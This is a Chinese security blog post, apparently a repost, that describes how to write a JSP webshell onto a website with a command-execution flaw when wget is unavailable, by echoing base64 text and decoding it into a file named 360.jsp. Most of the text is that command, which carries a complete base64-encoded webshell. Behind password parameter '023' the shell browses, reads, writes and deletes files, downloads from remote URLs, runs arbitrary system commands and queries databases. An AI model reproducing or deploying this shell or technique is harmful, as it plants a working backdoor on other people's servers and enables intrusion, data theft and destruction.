Author:[email protected]
原文链接:http://www.5ecurity.cn/index.php/archives/137/
我们有时候会遇到存在命令执行漏洞的网站,我们想写入一句话或者jsp大马。
偶尔运气比较背,或者策略比较严会出现以下两种情况:
wget
命令不存在这是我们可能想要通过echo
来写一个木马文件
echo neirong > /目录/360.jsp
问题来了 小马或者大马存在各种特殊字符需要转义输出文件中内容各种报错不解析等等
这时候我们可以利用base64
编码再解码输出到文件,完美解决转义问题
语句如下:
echo base64后的木马内容 |base64 -d > 360.jsp
echo PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4KCjxqc3A6cm9vdCB4bWxuczpqc3A9Imh0dHA6Ly9qYXZhLnN1bi5jb20vSlNQL1BhZ2UiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiB4bWxuczpjPSJodHRwOi8vamF2YS5zdW4uY29tL2pzcC9qc3RsL2NvcmUiIHZlcnNpb249IjEuMiI+CiAgPGpzcDpkaXJlY3RpdmUucGFnZSBjb250ZW50VHlwZT0idGV4dC9odG1sIiBwYWdlRW5jb2Rpbmc9IlVURi04Ii8+CiAgPGpzcDpkaXJlY3RpdmUucGFnZSBpbXBvcnQ9ImphdmEuaW8uKiIvPgogIDxqc3A6ZGlyZWN0aXZlLnBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKiIvPgogIDxqc3A6ZGlyZWN0aXZlLnBhZ2UgaW1wb3J0PSJqYXZhLm5ldC4qIi8+CiAgPGpzcDpkaXJlY3RpdmUucGFnZSBpbXBvcnQ9ImphdmEuc3FsLioiLz4KICA8anNwOmRpcmVjdGl2ZS5wYWdlIGltcG9ydD0iamF2YS50ZXh0LioiLz4KICA8anNwOmRlY2xhcmF0aW9uPlN0cmluZyBQd2Q9IjAyMyI7U3RyaW5nIGNzPSJVVEYtOCI7U3RyaW5nIEVDKFN0cmluZyBzKXRocm93cyBFeGNlcHRpb257cmV0dXJuIG5ldyBTdHJpbmcocy5nZXRCeXRlcygiSVNPLTg4NTktMSIpLGNzKTt9Q29ubmVjdGlvbiBHQyhTdHJpbmcgcyl0aHJvd3MgRXhjZXB0aW9ue1N0cmluZ1tdIHg9cy50cmltKCkuc3BsaXQoIlxyXG4iKTtDbGFzcy5mb3JOYW1lKHhbMF0udHJpbSgpKTtpZih4WzFdLmluZGV4T2YoImpkYmM6b3JhY2xlIikhPS0xKXtyZXR1cm4gRHJpdmVyTWFuYWdlci5nZXRDb25uZWN0aW9uKHhbMV0udHJpbSgpKyI6Iit4WzRdLHhbMl0uZXF1YWxzSWdub3JlQ2FzZSgiWy9udWxsXSIpPyIiOnhbMl0seFszXS5lcXVhbHNJZ25vcmVDYXNlKCJbL251bGxdIik/IiI6eFszXSk7fWVsc2V7Q29ubmVjdGlvbiBjPURyaXZlck1hbmFnZXIuZ2V0Q29ubmVjdGlvbih4WzFdLnRyaW0oKSx4WzJdLmVxdWFsc0lnbm9yZUNhc2UoIlsvbnVsbF0iKT8iIjp4WzJdLHhbM10uZXF1YWxzSWdub3JlQ2FzZSgiWy9udWxsXSIpPyIiOnhbM10pO2lmKHgubGVuZ3RoJmd0OzQpe2Muc2V0Q2F0YWxvZyh4WzRdKTt9cmV0dXJuIGM7fX12b2lkIEFBKFN0cmluZ0J1ZmZlciBzYil0aHJvd3MgRXhjZXB0aW9ue0ZpbGUgcltdPUZpbGUubGlzdFJvb3RzKCk7Zm9yKGludCBpPTA7aSZsdDtyLmxlbmd0aDtpKyspe3NiLmFwcGVuZChyW2ldLnRvU3RyaW5nKCkuc3Vic3RyaW5nKDAsMikpO319dm9pZCBCQihTdHJpbmcgcyxTdHJpbmdCdWZmZXIgc2IpdGhyb3dzIEV4Y2VwdGlvbntGaWxlIG9GPW5ldyBGaWxlKHMpLGxbXT1vRi5saXN0RmlsZXMoKTtTdHJpbmcgc1Qsc1Esc0Y9IiI7amF2YS51dGlsLkRhdGUgZHQ7U2ltcGxlRGF0ZUZvcm1hdCBmbT1uZXcgU2ltcGxlRGF0ZUZvcm1hdCgieXl5eS1NTS1kZCBISDptbTpzcyIpO2ZvcihpbnQgaT0wOyBpJmx0O2wubGVuZ3RoOyBpKyspe2R0PW5ldyBqYXZhLnV0aWwuRGF0ZShsW2ldLmxhc3RNb2RpZmllZCgpKTtzVD1mbS5mb3JtYXQoZHQpO3NRPWxbaV0uY2FuUmVhZCgpPyJSIjoiIjtzUSArPWxbaV0uY2FuV3JpdGUoKT8iIFciOiIiO2lmKGxbaV0uaXNEaXJlY3RvcnkoKSl7c2IuYXBwZW5kKGxbaV0uZ2V0TmFtZSgpKyIvXHQiK3NUKyJcdCIrbFtpXS5sZW5ndGgoKSsiXHQiK3NRKyJcbiIpO31lbHNle3NGKz1sW2ldLmdldE5hbWUoKSsiXHQiK3NUKyJcdCIrbFtpXS5sZW5ndGgoKSsiXHQiK3NRKyJcbiI7fX1zYi5hcHBlbmQoc0YpO312b2lkIEVFKFN0cmluZyBzKXRocm93cyBFeGNlcHRpb257RmlsZSBmPW5ldyBGaWxlKHMpO2lmKGYuaXNEaXJlY3RvcnkoKSl7RmlsZSB4W109Zi5saXN0RmlsZXMoKTtmb3IoaW50IGs9MDsgayAmbHQ7IHgubGVuZ3RoOyBrKyspe2lmKCF4W2tdLmRlbGV0ZSgpKXtFRSh4W2tdLmdldFBhdGgoKSk7fX19Zi5kZWxldGUoKTt9dm9pZCBGRihTdHJpbmcgcyxIdHRwU2VydmxldFJlc3BvbnNlIHIpdGhyb3dzIEV4Y2VwdGlvbntpbnQgbjtieXRlW10gYj1uZXcgYnl0ZVs1MTJdO3IucmVzZXQoKTtTZXJ2bGV0T3V0cHV0U3RyZWFtIG9zPXIuZ2V0T3V0cHV0U3RyZWFtKCk7QnVmZmVyZWRJbnB1dFN0cmVhbSBpcz1uZXcgQnVmZmVyZWRJbnB1dFN0cmVhbShuZXcgRmlsZUlucHV0U3RyZWFtKHMpKTtvcy53cml0ZSgoIi0mZ3Q7IisifCIpLmdldEJ5dGVzKCksMCwzKTt3aGlsZSgobj1pcy5yZWFkKGIsMCw1MTIpKSE9LTEpe29zLndyaXRlKGIsMCxuKTt9b3Mud3JpdGUoKCJ8IisiJmx0Oy0iKS5nZXRCeXRlcygpLDAsMyk7b3MuY2xvc2UoKTtpcy5jbG9zZSgpO312b2lkIEdHKFN0cmluZyBzLFN0cmluZyBkKXRocm93cyBFeGNlcHRpb257U3RyaW5nIGg9IjAxMjM0NTY3ODlBQkNERUYiO0ZpbGUgZj1uZXcgRmlsZShzKTtmLmNyZWF0ZU5ld0ZpbGUoKTtGaWxlT3V0cHV0U3RyZWFtIG9zPW5ldyBGaWxlT3V0cHV0U3RyZWFtKGYpO2ZvcihpbnQgaT0wOyBpJmx0O2QubGVuZ3RoKCk7aSs9Mil7b3Mud3JpdGUoKGguaW5kZXhPZihkLmNoYXJBdChpKSkgJmx0OyZsdDsgNCB8IGguaW5kZXhPZihkLmNoYXJBdChpKzEpKSkpO31vcy5jbG9zZSgpO312b2lkIEhIKFN0cmluZyBzLFN0cmluZyBkKXRocm93cyBFeGNlcHRpb257RmlsZSBzZj1uZXcgRmlsZShzKSxkZj1uZXcgRmlsZShkKTtpZihzZi5pc0RpcmVjdG9yeSgpKXtpZighZGYuZXhpc3RzKCkpe2RmLm1rZGlyKCk7fUZpbGUgeltdPXNmLmxpc3RGaWxlcygpO2ZvcihpbnQgaj0wOyBqJmx0O3oubGVuZ3RoOyBqKyspe0hIKHMrIi8iK3pbal0uZ2V0TmFtZSgpLGQrIi8iK3pbal0uZ2V0TmFtZSgpKTt9fWVsc2V7RmlsZUlucHV0U3RyZWFtIGlzPW5ldyBGaWxlSW5wdXRTdHJlYW0oc2YpO0ZpbGVPdXRwdXRTdHJlYW0gb3M9bmV3IEZpbGVPdXRwdXRTdHJlYW0oZGYpO2ludCBuO2J5dGVbXSBiPW5ldyBieXRlWzUxMl07d2hpbGUoKG49aXMucmVhZChiLDAsNTEyKSkhPS0xKXtvcy53cml0ZShiLDAsbik7fWlzLmNsb3NlKCk7b3MuY2xvc2UoKTt9fXZvaWQgSUkoU3RyaW5nIHMsU3RyaW5nIGQpdGhyb3dzIEV4Y2VwdGlvbntGaWxlIHNmPW5ldyBGaWxlKHMpLGRmPW5ldyBGaWxlKGQpO3NmLnJlbmFtZVRvKGRmKTt9dm9pZCBKSihTdHJpbmcgcyl0aHJvd3MgRXhjZXB0aW9ue0ZpbGUgZj1uZXcgRmlsZShzKTtmLm1rZGlyKCk7fXZvaWQgS0soU3RyaW5nIHMsU3RyaW5nIHQpdGhyb3dzIEV4Y2VwdGlvbntGaWxlIGY9bmV3IEZpbGUocyk7U2ltcGxlRGF0ZUZvcm1hdCBmbT1uZXcgU2ltcGxlRGF0ZUZvcm1hdCgieXl5eS1NTS1kZCBISDptbTpzcyIpO2phdmEudXRpbC5EYXRlIGR0PWZtLnBhcnNlKHQpO2Yuc2V0TGFzdE1vZGlmaWVkKGR0LmdldFRpbWUoKSk7fXZvaWQgTEwoU3RyaW5nIHMsU3RyaW5nIGQpdGhyb3dzIEV4Y2VwdGlvbntVUkwgdT1uZXcgVVJMKHMpO2ludCBuPTA7RmlsZU91dHB1dFN0cmVhbSBvcz1uZXcgRmlsZU91dHB1dFN0cmVhbShkKTtIdHRwVVJMQ29ubmVjdGlvbiBoPShIdHRwVVJMQ29ubmVjdGlvbikgdS5vcGVuQ29ubmVjdGlvbigpO0lucHV0U3RyZWFtIGlzPWguZ2V0SW5wdXRTdHJlYW0oKTtieXRlW10gYj1uZXcgYnl0ZVs1MTJdO3doaWxlKChuPWlzLnJlYWQoYikpIT0tMSl7b3Mud3JpdGUoYiwwLG4pO31vcy5jbG9zZSgpO2lzLmNsb3NlKCk7aC5kaXNjb25uZWN0KCk7fXZvaWQgTU0oSW5wdXRTdHJlYW0gaXMsU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257U3RyaW5nIGw7QnVmZmVyZWRSZWFkZXIgYnI9bmV3IEJ1ZmZlcmVkUmVhZGVyKG5ldyBJbnB1dFN0cmVhbVJlYWRlcihpcykpO3doaWxlKChsPWJyLnJlYWRMaW5lKCkpIT1udWxsKXtzYi5hcHBlbmQobCsiXHJcbiIpO319dm9pZCBOTihTdHJpbmcgcyxTdHJpbmdCdWZmZXIgc2IpdGhyb3dzIEV4Y2VwdGlvbntDb25uZWN0aW9uIGM9R0Mocyk7UmVzdWx0U2V0IHI9cy5pbmRleE9mKCJqZGJjOm9yYWNsZSIpIT0tMT9jLmdldE1ldGFEYXRhKCkuZ2V0U2NoZW1hcygpOmMuZ2V0TWV0YURhdGEoKS5nZXRDYXRhbG9ncygpO3doaWxlKHIubmV4dCgpKXtzYi5hcHBlbmQoci5nZXRTdHJpbmcoMSkrIlx0Iik7fXIuY2xvc2UoKTtjLmNsb3NlKCk7fXZvaWQgT08oU3RyaW5nIHMsU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257Q29ubmVjdGlvbiBjPUdDKHMpO1N0cmluZ1tdIHg9cy50cmltKCkuc3BsaXQoIlxyXG4iKTtSZXN1bHRTZXQgcj1jLmdldE1ldGFEYXRhKCkuZ2V0VGFibGVzKG51bGwscy5pbmRleE9mKCJqZGJjOm9yYWNsZSIpIT0tMT94Lmxlbmd0aCZndDs1P3hbNV06eFs0XTpudWxsLCIlIixuZXcgU3RyaW5nW117IlRBQkxFIn0pO3doaWxlKHIubmV4dCgpKXtzYi5hcHBlbmQoci5nZXRTdHJpbmcoIlRBQkxFX05BTUUiKSsiXHQiKTt9ci5jbG9zZSgpO2MuY2xvc2UoKTt9dm9pZCBQUChTdHJpbmcgcyxTdHJpbmdCdWZmZXIgc2IpdGhyb3dzIEV4Y2VwdGlvbntTdHJpbmdbXSB4PXMudHJpbSgpLnNwbGl0KCJcclxuIik7Q29ubmVjdGlvbiBjPUdDKHMpO1N0YXRlbWVudCBtPWMuY3JlYXRlU3RhdGVtZW50KDEwMDUsMTAwNyk7UmVzdWx0U2V0IHI9bS5leGVjdXRlUXVlcnkoInNlbGVjdCAqIGZyb20gIit4W3gubGVuZ3RoLTFdKTtSZXN1bHRTZXRNZXRhRGF0YSBkPXIuZ2V0TWV0YURhdGEoKTtmb3IoaW50IGk9MTtpJmx0Oz1kLmdldENvbHVtbkNvdW50KCk7aSsrKXtzYi5hcHBlbmQoZC5nZXRDb2x1bW5OYW1lKGkpKyIgKCIrZC5nZXRDb2x1bW5UeXBlTmFtZShpKSsiKVx0Iik7fXIuY2xvc2UoKTttLmNsb3NlKCk7Yy5jbG9zZSgpO312b2lkIFFRKFN0cmluZyBjcyxTdHJpbmcgcyxTdHJpbmcgcSxTdHJpbmdCdWZmZXIgc2IsU3RyaW5nIHApdGhyb3dzIEV4Y2VwdGlvbntDb25uZWN0aW9uIGM9R0Mocyk7U3RhdGVtZW50IG09Yy5jcmVhdGVTdGF0ZW1lbnQoMTAwNSwxMDA4KTtCdWZmZXJlZFdyaXRlciBidz1udWxsO3RyeXtSZXN1bHRTZXQgcj1tLmV4ZWN1dGVRdWVyeShxLmluZGV4T2YoIi0tZjoiKSE9LTE/cS5zdWJzdHJpbmcoMCxxLmluZGV4T2YoIi0tZjoiKSk6cSk7UmVzdWx0U2V0TWV0YURhdGEgZD1yLmdldE1ldGFEYXRhKCk7aW50IG49ZC5nZXRDb2x1bW5Db3VudCgpO2ZvcihpbnQgaT0xOyBpICZsdDs9bjsgaSsrKXtzYi5hcHBlbmQoZC5nZXRDb2x1bW5OYW1lKGkpKyJcdHxcdCIpO31zYi5hcHBlbmQoIlxyXG4iKTtpZihxLmluZGV4T2YoIi0tZjoiKSE9LTEpe0ZpbGUgZmlsZT1uZXcgRmlsZShwKTtpZihxLmluZGV4T2YoIi10bzoiKT09LTEpe2ZpbGUubWtkaXIoKTt9Ync9bmV3IEJ1ZmZlcmVkV3JpdGVyKG5ldyBPdXRwdXRTdHJlYW1Xcml0ZXIobmV3IEZpbGVPdXRwdXRTdHJlYW0obmV3IEZpbGUocS5pbmRleE9mKCItdG86IikhPS0xP3AudHJpbSgpOnArcS5zdWJzdHJpbmcocS5pbmRleE9mKCItLWY6IikrNCxxLmxlbmd0aCgpKS50cmltKCkpLHRydWUpLGNzKSk7fXdoaWxlKHIubmV4dCgpKXtmb3IoaW50IGk9MTsgaSZsdDs9bjtpKyspe2lmKHEuaW5kZXhPZigiLS1mOiIpIT0tMSl7Yncud3JpdGUoci5nZXRPYmplY3QoaSkrIiIrIlx0Iik7YncuZmx1c2goKTt9ZWxzZXtzYi5hcHBlbmQoci5nZXRPYmplY3QoaSkrIiIrIlx0fFx0Iik7fX1pZihidyE9bnVsbCl7YncubmV3TGluZSgpO31zYi5hcHBlbmQoIlxyXG4iKTt9ci5jbG9zZSgpO2lmKGJ3IT1udWxsKXtidy5jbG9zZSgpO319Y2F0Y2goRXhjZXB0aW9uIGUpe3NiLmFwcGVuZCgiUmVzdWx0XHR8XHRcclxuIik7dHJ5e20uZXhlY3V0ZVVwZGF0ZShxKTtzYi5hcHBlbmQoIkV4ZWN1dGUgU3VjY2Vzc2Z1bGx5IVx0fFx0XHJcbiIpO31jYXRjaChFeGNlcHRpb24gZWUpe3NiLmFwcGVuZChlZS50b1N0cmluZygpKyJcdHxcdFxyXG4iKTt9fW0uY2xvc2UoKTtjLmNsb3NlKCk7fTwvanNwOmRlY2xhcmF0aW9uPgogIDxqc3A6c2NyaXB0bGV0PmNzPXJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJ6MCIpIT1udWxsP3JlcXVlc3QuZ2V0UGFyYW1ldGVyKCJ6MCIpKyIiOmNzO3Jlc3BvbnNlLnNldENvbnRlbnRUeXBlKCJ0ZXh0L2h0bWwiKTtyZXNwb25zZS5zZXRDaGFyYWN0ZXJFbmNvZGluZyhjcyk7U3RyaW5nQnVmZmVyIHNiPW5ldyBTdHJpbmdCdWZmZXIoIiIpO3RyeXtTdHJpbmcgWj1FQyhyZXF1ZXN0LmdldFBhcmFtZXRlcihQd2QpKyIiKTtTdHJpbmcgejE9RUMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoInoxIikrIiIpO1N0cmluZyB6Mj1FQyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiejIiKSsiIik7c2IuYXBwZW5kKCItJmd0OyIrInwiKTtTdHJpbmcgcz1yZXF1ZXN0LmdldFNlc3Npb24oKS5nZXRTZXJ2bGV0Q29udGV4dCgpLmdldFJlYWxQYXRoKCIvIik7aWYoWi5lcXVhbHMoIkEiKSl7c2IuYXBwZW5kKHMrIlx0Iik7aWYoIXMuc3Vic3RyaW5nKDAsMSkuZXF1YWxzKCIvIikpe0FBKHNiKTt9fWVsc2UgaWYoWi5lcXVhbHMoIkIiKSl7QkIoejEsc2IpO31lbHNlIGlmKFouZXF1YWxzKCJDIikpe1N0cmluZyBsPSIiO0J1ZmZlcmVkUmVhZGVyIGJyPW5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIobmV3IEZpbGVJbnB1dFN0cmVhbShuZXcgRmlsZSh6MSkpKSk7d2hpbGUoKGw9YnIucmVhZExpbmUoKSkhPW51bGwpe3NiLmFwcGVuZChsKyJcclxuIik7fWJyLmNsb3NlKCk7fWVsc2UgaWYoWi5lcXVhbHMoIkQiKSl7QnVmZmVyZWRXcml0ZXIgYncyPW5ldyBCdWZmZXJlZFdyaXRlcihuZXcgT3V0cHV0U3RyZWFtV3JpdGVyKG5ldyBGaWxlT3V0cHV0U3RyZWFtKG5ldyBGaWxlKHoxKSkpKTtidzIud3JpdGUoejIpO2J3Mi5jbG9zZSgpO3NiLmFwcGVuZCgiMSIpO31lbHNlIGlmKFouZXF1YWxzKCJFIikpe0VFKHoxKTtzYi5hcHBlbmQoIjEiKTt9ZWxzZSBpZihaLmVxdWFscygiRiIpKXtGRih6MSxyZXNwb25zZSk7fWVsc2UgaWYoWi5lcXVhbHMoIkciKSl7R0coejEsejIpO3NiLmFwcGVuZCgiMSIpO31lbHNlIGlmKFouZXF1YWxzKCJIIikpe0hIKHoxLHoyKTtzYi5hcHBlbmQoIjEiKTt9ZWxzZSBpZihaLmVxdWFscygiSSIpKXtJSSh6MSx6Mik7c2IuYXBwZW5kKCIxIik7fWVsc2UgaWYoWi5lcXVhbHMoIkoiKSl7SkooejEpO3NiLmFwcGVuZCgiMSIpO31lbHNlIGlmKFouZXF1YWxzKCJLIikpe0tLKHoxLHoyKTtzYi5hcHBlbmQoIjEiKTt9ZWxzZSBpZihaLmVxdWFscygiTCIpKXtMTCh6MSx6Mik7c2IuYXBwZW5kKCIxIik7fWVsc2UgaWYoWi5lcXVhbHMoIk0iKSl7U3RyaW5nW10gYz17ejEuc3Vic3RyaW5nKDIpLHoxLnN1YnN0cmluZygwLDIpLHoyfTtQcm9jZXNzIHA9UnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhjKTtNTShwLmdldElucHV0U3RyZWFtKCksc2IpO01NKHAuZ2V0RXJyb3JTdHJlYW0oKSxzYik7fWVsc2UgaWYoWi5lcXVhbHMoIk4iKSl7Tk4oejEsc2IpO31lbHNlIGlmKFouZXF1YWxzKCJPIikpe09PKHoxLHNiKTt9ZWxzZSBpZihaLmVxdWFscygiUCIpKXtQUCh6MSxzYik7fWVsc2UgaWYoWi5lcXVhbHMoIlEiKSl7UVEoY3MsejEsejIsc2IsejIuaW5kZXhPZigiLXRvOiIpIT0tMT96Mi5zdWJzdHJpbmcoejIuaW5kZXhPZigiLXRvOiIpKzQsejIubGVuZ3RoKCkpOnMucmVwbGFjZUFsbCgiXFxcXCIsIi8iKSsiaW1hZ2VzLyIpO319Y2F0Y2goRXhjZXB0aW9uIGUpe3NiLmFwcGVuZCgiRVJST1IiKyI6Ly8gIitlLnRvU3RyaW5nKCkpO31zYi5hcHBlbmQoInwiKyImbHQ7LSIpO291dC5wcmludChzYi50b1N0cmluZygpKTs8L2pzcDpzY3JpcHRsZXQ+CjwvanNwOnJvb3Q+Cg== |base64 -d > 360.jsp
截图如下: